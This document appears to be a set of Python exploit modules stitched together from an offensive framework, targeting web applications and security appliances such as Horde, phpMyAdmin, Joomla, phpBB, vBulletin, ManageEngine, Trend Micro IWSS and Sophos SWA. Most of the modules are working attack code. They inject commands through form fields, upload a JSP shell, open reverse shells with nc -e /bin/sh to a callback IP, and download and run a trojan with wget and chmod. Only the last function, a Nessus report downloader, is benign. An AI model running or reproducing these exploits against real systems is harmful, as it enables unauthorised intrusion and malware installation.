b64encode(command).strip()), noresponse=True) time.sleep(2) command = "system(\"del /Q /F " + eval_file + "\");" data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False) for i in xrange(0, 3): time.sleep(1) ret = self.ISucceeded() if ret: break if not ret: self.log("WP> Did not succeed in getting a connectback") if ret: self.setInfo("WP> %s attacking %s:%d - completed (success!)" % (NAME, self.host, self.port)) else: self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return ret
def upload_file(self): # Open JSP file f = open(self.filename, "r") fdata = f.read() f.close() fdata = fdata.replace("CALLBACK_IP", self.callback.ip) fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port)) ua = spkproxy.UserAgent("", exploit=self) # Authentication url = '/' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) url = '/j_security_check' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'AUTHRULE_NAME': 'Authenticator', 'clienttype': 'html', 'ScreenWidth': '1920', 'ScreenHeight': '932', 'loginFromCookieData': '', 'ntlmv2': 'false', 'j_username': self.username, 'j_password': self.password, 'signInAutomatically': 'on', 'uname': '' }) data = ua.POST(mainurl, params) # Get apiKey url = '/' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) url = '/apiclient/ember/index.jsp' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) m = re.search('window.OPM.apiKey = "([^\"]+)";', data) if m is None: self.log("[D2SEC] - apiKey not found") return 0 # Upload JSP file params = '-----------------880735062871553\r\nContent-Disposition: form-data; name="post"\r\n\r\nd2\r\n-----------------880735062871553\r\nContent-Disposition: form-data; name="[object HTMLInputElement]i"; filename="d2.jsp"\r\nContent-Type: text/plain\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------880735062871553--\r\n' % ( len(fdata), fdata) url = '/api/json/dashboard/addPost?apiKey=%s&groupID=0' % m.group(1) mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) ua.addHeader( "Content-Type", "multipart/form-data; boundary=---------------880735062871553") data = ua.POST(mainurl, params) m = re.search('"post_id":"([^\"]+)"', data) if m is None: self.log("[D2SEC] - post_id not found") return 0 # Execute uploaded JSP file url = "/itplus/FileStorage/%s/d2.jsp" % m.group(1) mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) return 1
def run(self): self.getArgs() useragentstring = "http://" + self.host + ":%s" % self.port + "/" UA = spkproxy.UserAgent(useragentstring, auth=None, hostname=self.host, exploit=self) ret = 0 if self.command: self.log("WP> Executing Command: %s" % self.command) self.log("WP> Sending Exploit") UA.SetCookie("href", "system:" + self.command) data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=False) lhref = 'link.href = \'#' for i in range(len(data)): if lhref in data[i:i + len(lhref)]: if not '\';' in data[i + len(lhref):i + len(lhref) + 2]: result = data[i + len(lhref):data. find('\n\';', (i + len(lhref)))] ret = 1 self.log("WP> Command Result:\n%s\r\n " % prettyprint(result)) time.sleep(2) if ret: self.setInfo("WP> %s attacking %s:%d - completed (success!)" % (NAME, self.host, self.port)) else: self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return ret else: lsock = self.gettcplistener(self.rcv_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to list on port %d" % self.rcv_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.rcv_port) self.log("WP> Sending Exploit") # nc -n ip port -e /bin/sh \&\n UA.SetCookie( "href", "system:nc -n " + self.callback.ip + " " + str(self.rcv_port) + "%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e") data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=True) self.log("WP> Awaiting connectback") lsock.set_timeout(30) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) # Authentication url = '/logon.jsp' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) url = '/uilogonsubmit.jsp' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'wherefrom': '', 'wronglogon': 'no', 'pwd': 'Log On', 'uid': self.username, 'passwd': self.password }) data = ua.POST(mainurl, params) # Get CSRFGuardToken url = '/top.jsp' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl, entireresponse=True) m = re.search(b'CSRFGuardToken=([^\"]+)', data) if m is None: self.log("[D2SEC] - Token not found") return 0 token = m.group(1) self.log("[D2SEC] - CSRFGuardToken=%s" % token) # Exploitation """ url = "/servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({'CSRFGuardToken':token, 'op':'sroutemanage', 'fromurl':'/staticRoutes.jsp', 'failoverurl':'/staticRoutes.jsp', 'port':'', 'oldnetid':'', 'oldrouter':'', 'oldnetmask':'', 'oldport':'', 'netid':'192.168.1.0', 'netmask':'255.255.255.0', 'router':'192.168.1.1', 'interface_vlanid_sel':'eth1`%s`'%self.cmd}) buff = ua.POST(mainurl, params) """ url = "/SSHConfig.jsp" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'CSRFGuardToken': token, 'needSSHConfigure': 'yes', 'SSHStatus': 'enable', 'SSHPort': '`%s`' % self.cmd, 'op': 'save', 'cbSSHStatus': 'enable', 'btSSHPort': '221' }) buff = ua.POST(mainurl, params) while 1: time.sleep(1) return 1
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) if self.version == 0: ret = self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" + self.basepath, auth=auth, hostname=self.hostname, exploit=self) self.log("Getting index.php to grab our cookie") data = UA.GET("index.php") self.log("Data=%s" % data) if self.command: self.log("Command: %s" % self.command) phpsessid = UA.cookies.get("PHPSESSID") if not phpsessid: self.log("Failed to see a php session id!") self.log("Cookies=%s" % repr(UA.cookies)) return 0 command = self.command self.log("Sending Exploit Reply") fields = {} fields[ "langChoice"] = "<? print(\"startz\");passthru(stripslashes(\"" + command + "\"));print(\"endz\");?>\00" data = UA.POST("index.php", fields) expl = UA.POST( "index.php", "langChoice=../../../../../../../../../../../../../../tmp/sess_" + phpsessid + "\00") #self.log("Data=%s"%data) if "startz" in data: result = data.split("startz")[1].split("endz")[0] #self.log("Command data: %s"%prettyprint(data)) self.log("Command result=%s" % prettyprint(result)) ret = 1 else: self.log("Command not run - service patched?!") else: command = "<?" + self.get_php_to_mosdef().strip() + "?>\00" phpsessid = UA.cookies.get("PHPSESSID") if not phpsessid: self.log("Failed to see a php session id!") self.log("Cookies=%s" % repr(UA.cookies)) return 0 #command=command.replace("/","`pwd|cut -b1`") self.log("Command: %s" % command) self.log("Sending Exploit Reply") fields = {} fields["langChoice"] = command data = UA.POST("index.php", fields) expl = UA.POST( "index.php", "langChoice=../../../../../../../../../../../../../../tmp/sess_" + phpsessid + "\00") self.log("Data=%s" % data) self.log("Looking for PHP connectback") ret = self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): self.getargs() #test = self.test() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port)) self.log("Attacking %s:%d" % (self.hostname, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user != "": auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath self.log("useragentstring: %s" % useragentstring) UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) response = UA.GET(self.setupfile) #<input type="hidden" name="token" value="aa96b8c97b4908d5cddcdcdddc83d211" /> response = response.split(" ") try: tokenpos = response.index("name=\"token\"") token = response[tokenpos + 1].strip("\"").strip("value=\"") self.log("Found valid token to use: %s" % token) except ValueError: self.log("No usable token found. Will not proceed with attack") return 0 #manually encoded this stuff because urllib.quote_plus was having a bad day ... command = """:%22host%27%5d=%27%27%3b%20if($_GET%5b%27s%27%5d){eval(base64_decode($_GET%5b%27s%27%5d))%3b}%3b""" commandlen = len(urllib.unquote(command)) poststuff = """token=%s&action=save&configuration=a:1:{s:7:%%22Servers%%22%%3ba:1:{i:0%%3ba:6:{s:%s%s//%%22%%3bs:9:%%22localhost%%22%%3bs:9:%%22extension%%22%%3bs:6:%%22mysqli%%22%%3bs:12:%%22connect_type%%22%%3bs:3:%%22tcp%%22%%3bs:8:%%22compress%%22%%3bb:0%%3bs:9:%%22auth_type%%22%%3bs:6:%%22config%%22%%3bs:4:%%22user%%22%%3bs:4:%%22root%%22%%3b}}}&eoltype=unix""" % ( token, commandlen, command) #push the eval() code into the config.inc.php file response = UA.POST(self.setupfile, poststuff, noresponse=False) #get a shell! response = UA.GET( self.configfile + "?s=%s" % b64encode(self.get_php_to_mosdef()).strip(), noresponse=True) for i in xrange(0, 3): #wait three seconds for callback time.sleep(1) ret = self.ISucceeded() if ret: break if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) # Authentication url = "/spywall/login.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'loginBtn': 'Login', 'target': '/spywall/executive_summary.php', 'section': '', 'USERNAME': self.username, 'PASSWORD': self.password }) data = ua.POST(mainurl, params) if "login.php" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation self.cmd = 'd2`%s > cleaner/d2`' % self.cmd url = "/spywall/new_whitelist.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'applianceid': '1', 'sid': '1', 'oldUrl': '', 'isNew': '1', 'white_ip': self.cmd, 'whitelist': '1', 'ignore_auth': '0', 'white_comment': '' }) data = ua.POST(mainurl, params) url = "/spywall/cleaner/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if '404 Not Found' in data: self.log('[D2SEC] No valid session id found') return 0 if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port)) self.log("Using version: %s"%self.version) if self.version==0: ret=self.test() if not ret: self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)"%(NAME,self.host,self.port)) self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d"%(self.host,self.port)) self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s"%self.hostname) if self.ssl: protocol="https" else: protocol="http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth=None useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath self.log("useragentstring: %s"%useragentstring) UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s"%self.command) command=self.command command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip() data = UA.GET("index.php?c=%s&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(urllib.quote_plus(command))) if "---1243---" in data: result=data.split("1243---")[1].split("---3421")[0] self.log("Command data: %s"%prettyprint(data)) self.log("Command result=%s"%prettyprint(result)) ret=1 else: self.log("Command not run - service patched?!") else: command=self.get_php_to_mosdef().strip() #command=command.replace("/","`pwd|cut -b1`") self.log("PHP Callback Command: %s"%command) #we escape it with a " and then have a # to end it as a comment #A result of "Invalid argument supplied for foreach()" is normal when it works. #data = UA.GET("index.php?c=%s&searchword=%%22;eval(base64_decode($_GET[c]));%%23&option=com_search&Itemid=1"%(b64encode(command))) data = UA.GET("index.php?d=%s&c=eval(base64_decode($_GET[d]));&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(b64encode(command).strip()),noresponse=True) self.log("Looking for PHP connectback") for i in xrange(0,3): #wait three seconds for callback time.sleep(1) ret=self.ISucceeded() if ret: break if not ret: self.log("Did not succeed in getting a callback") #if data.count("Parse error"): # self.log("Some sort of parse error in our shellcode :<") #file("fail.html","w").write(data) if ret: self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port)) return ret
def run(self): for node in self.argsDict['passednodes']: self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log_info("Using version: %s" % self.version) ret = self.check() self.setProgress(30) if not ret: self.setInfo( "%s against %s:%d (failed: didn't find vulnerable target!)" % (NAME, self.host, self.port)) self.log_info("Testing didn't find vulnerable target") return 0 self.log_info("Attacking %s:%d" % (self.host, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) #self.log("VHost: %s"%self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath self.log("RequestString: %s" % requestString) UA = spkproxy.UserAgent(requestString, auth=auth, hostname=self.hostname, exploit=self) UA.SetCookie( self.magicCookie_name, self.magicCookie_val) # to clear the authentigation flag. self.log("Cookie: " + self.magicCookie_name + "=" + self.magicCookie_val) self.setProgress(50) # To-do: Handle enable/disable separatedly # #UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag. #self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val) data = UA.GET("") self.setProgress(70) if "status/status_deviceinfo" in data: self.log("Authentication successfully disabled!") self.log("You can now access web interface without password.") self.setProgress(100) ret = 1 else: if "Protected Object" in data: self.log("Exploit did not work. Wrong offsets?") ret = 0 if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) # Authentication url = "/" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) m = re.findall('name="STYLE" value="([^"]+)" ', data) if m is None: self.log('[D2SEC] Unable to get a valid session id') return 0 style = m[len(m) - 1] self.log("STYLE=%s" % style) url = "/index.php?c=login" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'STYLE': style, 'destination': '', 'section': '', 'username': self.username, 'password': self.password }) data = ua.POST(mainurl, params) if "Invalid username" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation self.cmd = 'user_timeline`%s > backup/d2`' % self.cmd url = "/index.php?c=logs" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'STYLE': style, 'period': 'today', 'xperiod': '', 'sb_xperiod': 'xdays', 'startDate': '', 'txt_time_start': '12:00 AM', 'endDate': '', 'txt_time_end': '11:59 PM', 'txt_filter_user_timeline': '', 'action': 'search', 'by': self.cmd, 'search': '', 'sort': 'time', 'multiplier': '1', 'start': '', 'end': '', 'direction': '1', '_': '' }) data = ua.POST(mainurl, params) url = "/backup/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if '404 - File not found' in data: self.log('[D2SEC] No valid session id found') return 0 if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) ua.addHeader( "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" ) # Authentication url = "/" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) m = re.findall('name="STYLE" value="([^"]+)" ', data) if m is None: self.log('[D2SEC] Unable to get a valid session id') return 0 style = m[len(m) - 1] url = "/index.php?c=login" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'STYLE': style, 'destination': '', 'section': '', 'username': self.username, 'password': self.password }) data = ua.POST(mainurl, params) if "Invalid username" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation self.cmd = '1.1.1.1_1.1.1.2`%s > backup/d2`' % self.cmd url = "/index.php?c=users_monitored_search_queries§ion=reports&STYLE=%s&unblockip=%s" % ( style, urllib.quote(self.cmd)) mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) url = "/backup/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if '404 - File not found' in data: self.log('[D2SEC] No valid session id found') return 0 if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port)) self.log("Using version: %s" % self.version) # # If we don't get a basepath argument we try to figure it out through # self.basepaths # if not self.basepath: ret = self.test() if not ret: self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port)) self.log("Testing didn't find vulnerable target") return 0 if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) if hasattr(self, "content_type"): self.ua.addHeader("Content-Type", self.content_type) # Testing may need to change if it mucks with anything.. self.ua.addHeader("User-Agent", self.random_ua()) noresponse = True if self.command: #we do get the response if we are sending it a command noresponse = False data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse) if self.command and data: blah = self.parse_command_response(data) sleep(1) # # Time to trigger our php callback # cback = self.get_php_to_mosdef() cback = b64encode(cback).strip() t = "z.php?c=%s" % cback data = self.ua.GET(t, noresponse=noresponse) # # Wait 5 seconds for callback # for i in range(0, 5): ret = self.ISucceeded() if ret: break sleep(1) # # Cleanup # logging.warning("Performing cleanup") command = """unlink('./z.php');""" serialized_arg = """arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:17:"vB_Database_MySQL":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:%d:"%s";}""" % (len(command), command) arg = quote(serialized_arg, safe="=").replace("%2A", "%00%2A%00") data = self.ua.GET(self.targetpath + "?" + arg) logging.warning("Cleanup DONE") self.setInfo("%s attacking %s:%d (DONE)" % (self.name, self.host, self.port)) self.setProgress(100) return ret
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) ua.addHeader( "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" ) # Authentication url = "/" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) m = re.findall('name="STYLE" value="([^"]+)" ', data) if m is None: self.log('[D2SEC] Unable to get a valid session id') return 0 style = m[len(m) - 1] url = "/index.php?c=login" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'STYLE': style, 'destination': '', 'section': '', 'username': self.username, 'password': self.password }) data = ua.POST(mainurl, params) if "Invalid username" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation self.cmd = '0.3156784180233425`%s > backup/d2`' % self.cmd url = "/index.php?c=report&name=traf_users" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'STYLE': style, 'chart': 'pie', 'period': 'custom', 'multiplier': '1', 'metric': '', 'token': self.cmd, 'start': '07/28/2017', 'end': '07/28/2017', 'filters': '{"topn": "25", "department": "sophos_swa_all_departments"}', 'pdf': '1' }) data = ua.POST(mainurl, params) url = "/backup/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if '404 - File not found' in data: self.log('[D2SEC] No valid session id found') return 0 if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) if self.version == 0: ret = self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None UA = spkproxy.UserAgent(protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s" % self.command) command = self.command command = "print '---1243---\n';passthru(\'" + command + "');print '---3421---\n'; ".strip( ) data = UA.GET( "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527" % (urllib.quote_plus(command))) if "---1243---" in data: result = data.split("1243---")[1].split("---3421")[0] self.log("Command data: %s" % prettyprint(data)) self.log("Command result=%s" % prettyprint(result)) ret = 1 else: self.log("Command not run - service patched?!") else: command = self.get_php_to_mosdef().strip() command = command.replace("/", "`pwd|cut -b1`") self.log("Command: %s" % command) data = UA.GET( "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527" % (urllib.quote_plus(command))) self.log("Looking for PHP connectback") ret = self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def download(self, widget): self.SelectedScan = [] column_names = ['Name', 'Date', 'Reference'] gladefile = self.exploitpath + "simple2.glade" self.wTree2 = gtk.glade.XML(gladefile) dic = { "on_start_clicked": self.start, "on_delreport_toggled": self.activatedel, "on_deselectall_clicked": self.deselectall, "on_selectall_clicked": self.selectall } self.wTree2.signal_autoconnect(dic) self.loaddlg = self.wTree2.get_widget("exploit_dialog") try: self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico") except: pass # Init reports treeview self.treeview_3 = self.wTree2.get_widget("mytree") self.treestore_3 = gtk.TreeStore(str, str, str) self.treeview_3.set_show_expanders(False) self.treeview_3.set_model(self.treestore_3) self.treeselection = self.treeview_3.get_selection() self.treeselection.set_mode(gtk.SELECTION_MULTIPLE) column = [None] * len(column_names) column[0] = gtk.TreeViewColumn(column_names[0], gtk.CellRendererText(), text=0) column[0].set_resizable(True) column[0].set_sort_column_id(0) column[1] = gtk.TreeViewColumn(column_names[1], gtk.CellRendererText(), text=1) column[1].set_resizable(True) column[1].set_sort_column_id(1) column[2] = gtk.TreeViewColumn(column_names[2], gtk.CellRendererText(), text=2) column[2].set_resizable(True) column[2].set_sort_column_id(2) self.treeview_3.append_column(column[0]) self.treeview_3.append_column(column[1]) self.treeview_3.append_column(column[2]) # Start downloader dialog result = self.loaddlg.run() if (result == gtk.RESPONSE_OK): if (self.treeselection.count_selected_rows() > 0): model, paths = self.treeselection.get_selected_rows() for p in paths: iter = self.treestore_3.get_iter(p) tmpRef = model.get_value(iter, 2) self.SelectedScan.append(tmpRef) mainurl = "https://" + self.qhost + ":" + self.port headers = [("Content-Type", "application/json")] UA = spkproxy.UserAgent(mainurl, exploit=self) UA.addHeader("X-Cookie", "token=%s" % self.token) for ref in self.SelectedScan: error = True self.log("[D2 LOG] Nessus get file information for %s" % ref) postdata = { 'format': 'nessus', } urldata = json.dumps(postdata) data = UA.POST(self.exporturl % ref, data=urldata, extraheaders=headers) response = json.loads(data) if "file" not in response: self.log("[D2 LOG] No file available") continue file_id = response["file"] self.log("[D2 LOG] Nessus get status file %s" % file_id) for i in range(0, 20): data = UA.GET(self.statusurl % (ref, file_id)) response = json.loads(data) if "status" not in response: self.log("[D2 LOG] Status not found") break status = response["status"] if status == "ready": error = False break time.sleep(1) if error == True: continue self.log("[D2 LOG] Nessus download file %s" % file_id) data = UA.GET(self.reporturl % (ref, file_id)) if not os.path.exists(self.exploitpath + "reports/"): os.mkdir(self.exploitpath + "reports/") filename = self.exploitpath + "reports/" + ref.replace( "/", "_") f = open(filename, "w") f.write(data) f.close() self.ReportFiles.append(filename) self.treestore_2.append(None, [filename]) else: self.log("[D2 LOG] - No Nessus report selected") self.loaddlg.destroy()
